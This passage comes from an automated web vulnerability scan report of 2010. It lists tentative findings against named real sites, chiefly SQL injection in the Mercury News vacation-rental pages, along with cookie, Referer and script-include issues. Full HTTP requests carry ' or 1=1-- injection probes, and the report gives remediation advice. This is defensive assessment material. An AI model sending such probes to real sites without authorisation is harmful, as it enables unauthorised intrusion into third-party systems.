3.329. http://ads.yldmgrimg.net/apex/mediastore/062730bb-1899-481b-a0a5-5d453b885c3c [REST URL parameter 2]

3.330. http://ads.yldmgrimg.net/apex/mediastore/062730bb-1899-481b-a0a5-5d453b885c3c [REST URL parameter 3]

3.331. http://ads.yldmgrimg.net/apex/mediastore/383c4ed9-f242-4f61-b9cc-f1091f29b070 [REST URL parameter 1]

3.332. http://ads.yldmgrimg.net/apex/mediastore/383c4ed9-f242-4f61-b9cc-f1091f29b070 [REST URL parameter 2]

3.333. http://ads.yldmgrimg.net/apex/mediastore/383c4ed9-f242-4f61-b9cc-f1091f29b070 [REST URL parameter 3]

3.334. http://ads.yldmgrimg.net/apex/mediastore/52b2888f-eb6d-4556-a1ff-b178fce39ee6 [REST URL parameter 1]

3.335. http://ads.yldmgrimg.net/apex/mediastore/52b2888f-eb6d-4556-a1ff-b178fce39ee6 [REST URL parameter 2]

3.336. http://ads.yldmgrimg.net/apex/mediastore/52b2888f-eb6d-4556-a1ff-b178fce39ee6 [REST URL parameter 3]

3.337. http://ads.yldmgrimg.net/apex/mediastore/5e6edab9-925f-4cc4-ae36-5a558abc5d6a [REST URL parameter 1]

3.338. http://ads.yldmgrimg.net/apex/mediastore/5e6edab9-925f-4cc4-ae36-5a558abc5d6a [REST URL parameter 2]

3.339. http://ads.yldmgrimg.net/apex/mediastore/5e6edab9-925f-4cc4-ae36-5a558abc5d6a [REST URL parameter 3]

3.340. http://ads.yldmgrimg.net/apex/mediastore/8ba866c3-ac17-4b3d-baf7-9a95af0665d7 [REST URL parameter 1]

3.341. http://ads.yldmgrimg.net/apex/mediastore/8ba866c3-ac17-4b3d-baf7-9a95af0665d7 [REST URL parameter 2]

3.342. http://ads.yldmgrimg.net/apex/mediastore/8ba866c3-ac17-4b3d-baf7-9a95af0665d7 [REST URL parameter 3]

3.343. http://ads.yldmgrimg.net/apex/mediastore/8d3d0f79-5b47-4138-9678-2297d2caf879 [REST URL parameter 1]

3.344. http://ads.yldmgrimg.net/apex/mediastore/8d3d0f79-5b47-4138-9678-2297d2caf879 [REST URL parameter 2]

3.345. http://ads.yldmgrimg.net/apex/mediastore/8d3d0f79-5b47-4138-9678-2297d2caf879 [REST URL parameter 3]

3.346. http://ads.yldmgrimg.net/apex/mediastore/93e8d828-2c6f-42fb-b852-7b8b0226097a [REST URL parameter 1]

3.347. http://ads.yldmgrimg.net/apex/mediastore/93e8d828-2c6f-42fb-b852-7b8b0226097a [REST URL parameter 2]

3.348. http://ads.yldmgrimg.net/apex/mediastore/93e8d828-2c6f-42fb-b852-7b8b0226097a [REST URL parameter 3]

3.349. http://ads.yldmgrimg.net/apex/mediastore/99a22469-f4ac-4f28-89af-1b875134b000 [REST URL parameter 1]

3.350. http://ads.yldmgrimg.net/apex/mediastore/99a22469-f4ac-4f28-89af-1b875134b000 [REST URL parameter 2]

3.351. http://ads.yldmgrimg.net/apex/mediastore/99a22469-f4ac-4f28-89af-1b875134b000 [REST URL parameter 3]

3.352. http://ads.yldmgrimg.net/apex/mediastore/a41b7019-ffe4-4441-82ec-999ddc10ec64 [REST URL parameter 1]

3.353. http://ads.yldmgrimg.net/apex/mediastore/a41b7019-ffe4-4441-82ec-999ddc10ec64 [REST URL parameter 2]

3.354. http://ads.yldmgrimg.net/apex/mediastore/a41b7019-ffe4-4441-82ec-999ddc10ec64 [REST URL parameter 3]

3.355. http://ads.yldmgrimg.net/apex/mediastore/c3d92b61-4f57-4cda-87bb-1d308db151c3 [REST URL parameter 1]

3.356. http://ads.yldmgrimg.net/apex/mediastore/c3d92b61-4f57-4cda-87bb-1d308db151c3 [REST URL parameter 2]

3.357. http://ads.yldmgrimg.net/apex/mediastore/c3d92b61-4f57-4cda-87bb-1d308db151c3 [REST URL parameter 3]

3.358. http://ads.yldmgrimg.net/apex/mediastore/e2331a53-6c4d-4d4a-a1a0-3e7325e9fea7 [REST URL parameter 1]

3.359. http://ads.yldmgrimg.net/apex/mediastore/e2331a53-6c4d-4d4a-a1a0-3e7325e9fea7 [REST URL parameter 2]

3.360. http://ads.yldmgrimg.net/apex/mediastore/e2331a53-6c4d-4d4a-a1a0-3e7325e9fea7 [REST URL parameter 3]

3.361. http://ads.yldmgrimg.net/apex/template/swfobject.js [REST URL parameter 1]

3.362. http://ads.yldmgrimg.net/apex/template/swfobject.js [REST URL parameter 2]

3.363. http://ads.yldmgrimg.net/apex/template/swfobject.js [REST URL parameter 3]

3.364. http://optimized-by.rubiconproject.com/a/5833/7531/24864-2.js [ruid cookie]

3.365. http://optimized-by.rubiconproject.com/a/5833/7750/12853-2.js [ruid cookie]

3.366. http://optimized-by.rubiconproject.com/a/5833/7750/12853-9.js [ruid cookie]

3.367. http://optimized-by.rubiconproject.com/a/dk.js [ruid cookie]

3.368. http://www.airbnb.com/search/ [bev cookie]

4. Session token in URL

5. Cookie without HttpOnly flag set

5.1. http://storegrid.vembu.com/online-backup/backup-software-pricing.php

5.2. http://ad.yieldmanager.com/pixel

5.3. http://fisherinvestments.112.2o7.net/b/ss/finvfisherinvestmentscom/1/H.7-pdv-2/s58622881630435

5.4. http://pro.vembu.com/

6. Cookie scoped to parent domain

7. Cross-domain Referer leakage

7.1. http://www.fi.com/weballey/AlleyForm.aspx

7.2. http://www.fi.com/weballey/alleyletter.aspx

7.3. http://www.fi.com/weballey/alleyletter.aspx

8. Cross-domain script include

8.1. http://fi.com/

8.2. http://storegrid.vembu.com/online-backup/backup-software-pricing.php

8.3. http://storegrid.vembu.com/online-backup/computer-backup.php

8.4. http://storegrid.vembu.com/online-backup/network-backup.php

8.5. http://www.fi.com/

8.6. http://www.fi.com/weballey/AlleyForm.aspx

8.7. http://www.fi.com/weballey/alleyletter.aspx

9. Email addresses disclosed

9.1. http://pro.vembu.com/js/jquery.slideshow.js

9.2. http://storegrid.vembu.com/online-backup/backup-software-pricing.php

9.3. http://storegrid.vembu.com/online-backup/computer-backup.php

9.4. http://storegrid.vembu.com/online-backup/network-backup.php

9.5. http://www.fi.com/weballey/AlleyForm.aspx

9.6. http://www.fi.com/weballey/alleyletter.aspx

10. Private IP addresses disclosed

11. Content type incorrectly stated

11.1. http://4c28d6.r.axf8.net/mr/a.gif

11.2. http://fisherinvestments.tt.omtrdc.net/m2/fisherinvestments/mbox/standard

11.3. https://mail.google.com/mail/

11.4. http://pro.vembu.com/images/want-to-resell-button.gif

11.5. http://stats.visistat.com/conversion.php

11.6. http://www.vembu.com/border-radius.htc

11.7. http://www.vembu.com/style/style.css.php



1. SQL injection  next
There are 9 instances of this issue:

Issue background

SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.

Issue remediation

The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.

You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:



1.1. http://4c28d6.r.axf8.net/mr/a.gif [a parameter]  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://4c28d6.r.axf8.net
Path:   /mr/a.gif

Issue detail

The a parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the a parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /mr/a.gif?a=4C28D6'&v=1 HTTP/1.1
Accept: */*
Referer: http://www.mercurynews.com/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: 4c28d6.r.axf8.net
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 500 Internal Server Error
Cache-Control: private
Content-Length: 3028
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 15 Nov 2010 02:46:01 GMT

<html>
<head>
<title>Runtime Error</title>
<style>
body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;}
p {font-family:"Verdana";fon
...[SNIP]...

Request 2

GET /mr/a.gif?a=4C28D6''&v=1 HTTP/1.1
Accept: */*
Referer: http://www.mercurynews.com/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: 4c28d6.r.axf8.net
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 0
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 15 Nov 2010 02:46:01 GMT


1.2. http://vacationrentals.mercurynews.com/vacation-rentals/mexico+1+3 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://vacationrentals.mercurynews.com
Path:   /vacation-rentals/mexico+1+3

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payloads 11532009'%20or%201%3d1--%20 and 11532009'%20or%201%3d2--%20 were each submitted in the REST URL parameter 2. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /vacation-rentals/mexico+1+311532009'%20or%201%3d1--%20 HTTP/1.1
Host: vacationrentals.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 02:09:53 GMT
Server: Apache
X-Powered-By: PHP/5.2.10
Set-Cookie: PHPSESSID=8ujob2uvkakdjoomnj3dec56e3; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Last-Modified: Mon, 15 Nov 2010 02:09:53 GMT
Cache-Control: post-check=0, pre-check=0
Set-Cookie: pt=MERC%7C1114101809; expires=Tue, 15-Nov-2011 02:09:53 GMT
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 23032

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
"http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
   <title>San Jose Mercury News: Zimbabwe Vacation Homes, Zimbabwe Vacation Rentals, Holiday Homes, Holiday Rentals</title>
   <meta name="keywords" content="San Jose Mercury News: Zimbabwe Vacation Homes, Zimbabwe Vacation Rentals, Holiday Homes, Holiday Rentals"/>
   <meta name="description" content="San Jose Mercury News: Zimbabwe Vacation Homes, Zimbabwe Vacation Rentals, Villas, Estates, Cottages, Cabins, Condos, self-catering, Holiday Homes, Holiday Rentals"/>
   <meta name="copyright" content="Copyright &copy; 2010 Vacapedia, Inc.
All Rights Reserved."/>
<link href="/css/master.css" rel="stylesheet" type="text/css">
    <link href="/affiliates/merc/css/merc-new.css" rel="stylesheet" type="text/css">
        <script src="http://www.traveladvertising.com/Live/TanHeader.aspx?PlacementId=3" language="javascript" type="text/javascript"></script>
<script src="/affiliates/merc/js/ads_vars.js" type="text/javascript"></script>
<script type="text/javascript" src="http://e.yieldmanager.net/script.js" ></script>
</head>
<body id="vacation-rentals" class="merc yui-skin-sam">
<div id="main">
<div id="main-wrapper">
       <div id="header">
    <div id="ad-leader-board"><script type="text/javascript">
sr_adspace_id = 7728907;
sr_adspace_width = 728;
sr_adspace_height = 90;
sr_ad_new_window = true;
sr_adspace_type = "graphic";
</script>
<script type="text/javascript" src="http://ad.afy11.net/srad.js?azId=7728907">
</script></div> <div id="hdrlogo">
           <div id="logo"><a href="http://www.mercurynews.com"><img alt="" border="0" src="/affiliates/merc/images/merc-logo.gif" /></a></div>
<div id="hdrmsg"><h1>Advertise your vacation rental on Bay Area News Group and reach millions of travelers</h1></div> <div id="content-top-right"><a href="https://www.vacapedia.com/own-mgr/listing.php?aff=merc">Owners Sign In</a></div>
</div>

...[SNIP]...

Request 2

GET /vacation-rentals/mexico+1+311532009'%20or%201%3d2--%20 HTTP/1.1
Host: vacationrentals.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 02:09:53 GMT
Server: Apache
X-Powered-By: PHP/5.2.10
Set-Cookie: PHPSESSID=74apb49qlrm40k36lpm5uut1p7; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Last-Modified: Mon, 15 Nov 2010 02:09:53 GMT
Cache-Control: post-check=0, pre-check=0
Set-Cookie: pt=MERC%7C1114101809; expires=Tue, 15-Nov-2011 02:09:53 GMT
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 22984

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
"http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
   <title>San Jose Mercury News: Vacation Homes, Vacation Rentals, Holiday Homes, Holiday Rentals</title>
   <meta name="keywords" content="San Jose Mercury News: Vacation Homes, Vacation Rentals, Holiday Homes, Holiday Rentals"/>
   <meta name="description" content="San Jose Mercury News: Vacation Homes, Vacation Rentals, Villas, Estates, Cottages, Cabins, Condos, self-catering, Holiday Homes, Holiday Rentals"/>
   <meta name="copyright" content="Copyright &copy; 2010 Vacapedia, Inc.
All Rights Reserved."/>
<link href="/css/master.css" rel="stylesheet" type="text/css">
    <link href="/affiliates/merc/css/merc-new.css" rel="stylesheet" type="text/css">
        <script src="http://www.traveladvertising.com/Live/TanHeader.aspx?PlacementId=3" language="javascript" type="text/javascript"></script>
<script src="/affiliates/merc/js/ads_vars.js" type="text/javascript"></script>
<script type="text/javascript" src="http://e.yieldmanager.net/script.js" ></script>
</head>
<body id="vacation-rentals" class="merc yui-skin-sam">
<div id="main">
<div id="main-wrapper">
       <div id="header">
    <div id="ad-leader-board"><script type="text/javascript">
sr_adspace_id = 7728907;
sr_adspace_width = 728;
sr_adspace_height = 90;
sr_ad_new_window = true;
sr_adspace_type = "graphic";
</script>
<script type="text/javascript" src="http://ad.afy11.net/srad.js?azId=7728907">
</script></div> <div id="hdrlogo">
           <div id="logo"><a href="http://www.mercurynews.com"><img alt="" border="0" src="/affiliates/merc/images/merc-logo.gif" /></a></div>
<div id="hdrmsg"><h1>Advertise your vacation rental on Bay Area News Group and reach millions of travelers</h1></div> <div id="content-top-right"><a href="https://www.vacapedia.com/own-mgr/listing.php?aff=merc">Owners Sign In</a></div>
</div>
<div class="clearfix"></div>

...[SNIP]...

1.3. http://vacationrentals.mercurynews.com/vacation-rentals/united-states+california+san-diego+3+721 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://vacationrentals.mercurynews.com
Path:   /vacation-rentals/united-states+california+san-diego+3+721

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payloads 49493120'%20or%201%3d1--%20 and 49493120'%20or%201%3d2--%20 were each submitted in the REST URL parameter 2. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /vacation-rentals/united-states+california+san-diego+3+72149493120'%20or%201%3d1--%20 HTTP/1.1
Host: vacationrentals.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 02:09:53 GMT
Server: Apache
X-Powered-By: PHP/5.2.10
Set-Cookie: PHPSESSID=631is5btcuva0jdi1p6rt3oco1; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Last-Modified: Mon, 15 Nov 2010 02:09:53 GMT
Cache-Control: post-check=0, pre-check=0
Set-Cookie: pt=MERC%7C1114101809; expires=Tue, 15-Nov-2011 02:09:53 GMT
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 23062

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
"http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
   <title>San Jose Mercury News: Roquemaure Vacation Homes, Roquemaure Vacation Rentals, Holiday Homes, Holiday Rentals, Provence, France</title>
   <meta name="keywords" content="San Jose Mercury News: Roquemaure Vacation Homes, Roquemaure Vacation Rentals, Holiday Homes, Holiday Rentals"/>
   <meta name="description" content="San Jose Mercury News: Roquemaure Vacation Homes, Roquemaure Vacation Rentals, Villas, Estates, Cottages, Cabins, Condos, self-catering, Holiday Homes, Holiday Rentals"/>
   <meta name="copyright" content="Copyright &copy; 2010 Vacapedia, Inc.
All Rights Reserved."/>
<link href="/css/master.css" rel="stylesheet" type="text/css">
    <link href="/affiliates/merc/css/merc-new.css" rel="stylesheet" type="text/css">
        <script src="http://www.traveladvertising.com/Live/TanHeader.aspx?PlacementId=3" language="javascript" type="text/javascript"></script>
<script src="/affiliates/merc/js/ads_vars.js" type="text/javascript"></script>
<script type="text/javascript" src="http://e.yieldmanager.net/script.js" ></script>
</head>
<body id="vacation-rentals" class="merc yui-skin-sam">
<div id="main">
<div id="main-wrapper">
       <div id="header">
    <div id="ad-leader-board"><script type="text/javascript">
sr_adspace_id = 7728907;
sr_adspace_width = 728;
sr_adspace_height = 90;
sr_ad_new_window = true;
sr_adspace_type = "graphic";
</script>
<script type="text/javascript" src="http://ad.afy11.net/srad.js?azId=7728907">
</script></div> <div id="hdrlogo">
           <div id="logo"><a href="http://www.mercurynews.com"><img alt="" border="0" src="/affiliates/merc/images/merc-logo.gif" /></a></div>
<div id="hdrmsg"><h1>Advertise your vacation rental on Bay Area News Group and reach millions of travelers</h1></div> <div id="content-top-right"><a href="https://www.vacapedia.com/own-mgr/listing.php?aff=merc">Owners Sign In</a></div>

...[SNIP]...

Request 2

GET /vacation-rentals/united-states+california+san-diego+3+72149493120'%20or%201%3d2--%20 HTTP/1.1
Host: vacationrentals.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 02:09:56 GMT
Server: Apache
X-Powered-By: PHP/5.2.10
Set-Cookie: PHPSESSID=emdj4n1b4v9s40nuf30ov0hlp7; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Last-Modified: Mon, 15 Nov 2010 02:09:56 GMT
Cache-Control: post-check=0, pre-check=0
Set-Cookie: pt=MERC%7C1114101809; expires=Tue, 15-Nov-2011 02:09:56 GMT
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 22988

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
"http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
   <title>San Jose Mercury News: Vacation Homes, Vacation Rentals, Holiday Homes, Holiday Rentals, , </title>
   <meta name="keywords" content="San Jose Mercury News: Vacation Homes, Vacation Rentals, Holiday Homes, Holiday Rentals"/>
   <meta name="description" content="San Jose Mercury News: Vacation Homes, Vacation Rentals, Villas, Estates, Cottages, Cabins, Condos, self-catering, Holiday Homes, Holiday Rentals"/>
   <meta name="copyright" content="Copyright &copy; 2010 Vacapedia, Inc.
All Rights Reserved."/>
<link href="/css/master.css" rel="stylesheet" type="text/css">
    <link href="/affiliates/merc/css/merc-new.css" rel="stylesheet" type="text/css">
        <script src="http://www.traveladvertising.com/Live/TanHeader.aspx?PlacementId=3" language="javascript" type="text/javascript"></script>
<script src="/affiliates/merc/js/ads_vars.js" type="text/javascript"></script>
<script type="text/javascript" src="http://e.yieldmanager.net/script.js" ></script>
</head>
<body id="vacation-rentals" class="merc yui-skin-sam">
<div id="main">
<div id="main-wrapper">
       <div id="header">
    <div id="ad-leader-board"><script type="text/javascript">
sr_adspace_id = 7728907;
sr_adspace_width = 728;
sr_adspace_height = 90;
sr_ad_new_window = true;
sr_adspace_type = "graphic";
</script>
<script type="text/javascript" src="http://ad.afy11.net/srad.js?azId=7728907">
</script></div> <div id="hdrlogo">
           <div id="logo"><a href="http://www.mercurynews.com"><img alt="" border="0" src="/affiliates/merc/images/merc-logo.gif" /></a></div>
<div id="hdrmsg"><h1>Advertise your vacation rental on Bay Area News Group and reach millions of travelers</h1></div> <div id="content-top-right"><a href="https://www.vacapedia.com/own-mgr/listing.php?aff=merc">Owners Sign In</a></div>
</div>
<div class="clearfix"></div>

...[SNIP]...

1.4. http://vacationrentals.mercurynews.com/vacation-rentals/united-states+california+santa-cruz+3+749 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://vacationrentals.mercurynews.com
Path:   /vacation-rentals/united-states+california+santa-cruz+3+749

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payloads 19013238'%20or%201%3d1--%20 and 19013238'%20or%201%3d2--%20 were each submitted in the REST URL parameter 2. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /vacation-rentals/united-states+california+santa-cruz+3+74919013238'%20or%201%3d1--%20 HTTP/1.1
Host: vacationrentals.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 02:10:19 GMT
Server: Apache
X-Powered-By: PHP/5.2.10
Set-Cookie: PHPSESSID=540tshnlgti7qttv1fhc09cdh4; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Last-Modified: Mon, 15 Nov 2010 02:10:19 GMT
Cache-Control: post-check=0, pre-check=0
Set-Cookie: pt=MERC%7C1114101810; expires=Tue, 15-Nov-2011 02:10:19 GMT
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 23062

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
"http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
   <title>San Jose Mercury News: Roquemaure Vacation Homes, Roquemaure Vacation Rentals, Holiday Homes, Holiday Rentals, Provence, France</title>
   <meta name="keywords" content="San Jose Mercury News: Roquemaure Vacation Homes, Roquemaure Vacation Rentals, Holiday Homes, Holiday Rentals"/>
   <meta name="description" content="San Jose Mercury News: Roquemaure Vacation Homes, Roquemaure Vacation Rentals, Villas, Estates, Cottages, Cabins, Condos, self-catering, Holiday Homes, Holiday Rentals"/>
   <meta name="copyright" content="Copyright &copy; 2010 Vacapedia, Inc.
All Rights Reserved."/>
<link href="/css/master.css" rel="stylesheet" type="text/css">
    <link href="/affiliates/merc/css/merc-new.css" rel="stylesheet" type="text/css">
        <script src="http://www.traveladvertising.com/Live/TanHeader.aspx?PlacementId=3" language="javascript" type="text/javascript"></script>
<script src="/affiliates/merc/js/ads_vars.js" type="text/javascript"></script>
<script type="text/javascript" src="http://e.yieldmanager.net/script.js" ></script>
</head>
<body id="vacation-rentals" class="merc yui-skin-sam">
<div id="main">
<div id="main-wrapper">
       <div id="header">
    <div id="ad-leader-board"><script type="text/javascript">
sr_adspace_id = 7728907;
sr_adspace_width = 728;
sr_adspace_height = 90;
sr_ad_new_window = true;
sr_adspace_type = "graphic";
</script>
<script type="text/javascript" src="http://ad.afy11.net/srad.js?azId=7728907">
</script></div> <div id="hdrlogo">
           <div id="logo"><a href="http://www.mercurynews.com"><img alt="" border="0" src="/affiliates/merc/images/merc-logo.gif" /></a></div>
<div id="hdrmsg"><h1>Advertise your vacation rental on Bay Area News Group and reach millions of travelers</h1></div> <div id="content-top-right"><a href="https://www.vacapedia.com/own-mgr/listing.php?aff=merc">Owners Sign In</a></div>

...[SNIP]...

Request 2

GET /vacation-rentals/united-states+california+santa-cruz+3+74919013238'%20or%201%3d2--%20 HTTP/1.1
Host: vacationrentals.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 02:10:22 GMT
Server: Apache
X-Powered-By: PHP/5.2.10
Set-Cookie: PHPSESSID=mrkrc46cv5di0srn85dja0epn4; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Last-Modified: Mon, 15 Nov 2010 02:10:22 GMT
Cache-Control: post-check=0, pre-check=0
Set-Cookie: pt=MERC%7C1114101810; expires=Tue, 15-Nov-2011 02:10:22 GMT
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 22988

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
"http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
   <title>San Jose Mercury News: Vacation Homes, Vacation Rentals, Holiday Homes, Holiday Rentals, , </title>
   <meta name="keywords" content="San Jose Mercury News: Vacation Homes, Vacation Rentals, Holiday Homes, Holiday Rentals"/>
   <meta name="description" content="San Jose Mercury News: Vacation Homes, Vacation Rentals, Villas, Estates, Cottages, Cabins, Condos, self-catering, Holiday Homes, Holiday Rentals"/>
   <meta name="copyright" content="Copyright &copy; 2010 Vacapedia, Inc.
All Rights Reserved."/>
<link href="/css/master.css" rel="stylesheet" type="text/css">
    <link href="/affiliates/merc/css/merc-new.css" rel="stylesheet" type="text/css">
        <script src="http://www.traveladvertising.com/Live/TanHeader.aspx?PlacementId=3" language="javascript" type="text/javascript"></script>
<script src="/affiliates/merc/js/ads_vars.js" type="text/javascript"></script>
<script type="text/javascript" src="http://e.yieldmanager.net/script.js" ></script>
</head>
<body id="vacation-rentals" class="merc yui-skin-sam">
<div id="main">
<div id="main-wrapper">
       <div id="header">
    <div id="ad-leader-board"><script type="text/javascript">
sr_adspace_id = 7728907;
sr_adspace_width = 728;
sr_adspace_height = 90;
sr_ad_new_window = true;
sr_adspace_type = "graphic";
</script>
<script type="text/javascript" src="http://ad.afy11.net/srad.js?azId=7728907">
</script></div> <div id="hdrlogo">
           <div id="logo"><a href="http://www.mercurynews.com"><img alt="" border="0" src="/affiliates/merc/images/merc-logo.gif" /></a></div>
<div id="hdrmsg"><h1>Advertise your vacation rental on Bay Area News Group and reach millions of travelers</h1></div> <div id="content-top-right"><a href="https://www.vacapedia.com/own-mgr/listing.php?aff=merc">Owners Sign In</a></div>
</div>
<div class="clearfix"></div>

...[SNIP]...

1.5. http://vacationrentals.mercurynews.com/vacation-rentals/united-states+california+south-lake-tahoe+3+48283 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://vacationrentals.mercurynews.com
Path:   /vacation-rentals/united-states+california+south-lake-tahoe+3+48283

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payloads 97937254'%20or%201%3d1--%20 and 97937254'%20or%201%3d2--%20 were each submitted in the REST URL parameter 2. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /vacation-rentals/united-states+california+south-lake-tahoe+3+4828397937254'%20or%201%3d1--%20 HTTP/1.1
Host: vacationrentals.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 02:10:23 GMT
Server: Apache
X-Powered-By: PHP/5.2.10
Set-Cookie: PHPSESSID=b5v5g8ir8pqa11k2egk85hkl56; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Last-Modified: Mon, 15 Nov 2010 02:10:23 GMT
Cache-Control: post-check=0, pre-check=0
Set-Cookie: pt=MERC%7C1114101810; expires=Tue, 15-Nov-2011 02:10:23 GMT
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 23062

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
"http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
